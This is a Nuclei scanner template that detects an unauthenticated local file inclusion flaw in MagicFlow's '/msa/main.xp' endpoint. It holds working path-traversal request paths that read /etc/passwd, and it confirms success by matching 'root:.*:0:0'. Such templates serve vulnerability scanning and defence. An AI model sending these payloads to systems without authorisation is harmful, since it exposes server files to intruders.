id: magicflow-lfi

info:
  name: MagicFlow - Local File Inclusion
  author: gy741
  severity: critical
  description: A vulnerability in MagicFlow allows remote unauthenticated users to access locally stored files on the server and return their content via the '/msa/main.xp' endpoint and the 'Fun' parameter.
  reference: https://www.seebug.org/vuldb/ssvid-89258
  tags: magicflow,lfi

requests:
  - method: GET
    path:
      - "{{BaseURL}}/msa/main.xp?Fun=msaDataCenetrDownLoadMore+delflag=1+downLoadFileName=msagroup.txt+downLoadFile=../../../../../../etc/passwd"
      - "{{BaseURL}}/msa/../../../../../../../../etc/passwd"

    matchers-condition: and
    matchers:

      - type: regex
        regex:
          - "root:.*:0:0"

      - type: status
        status:
          - 200
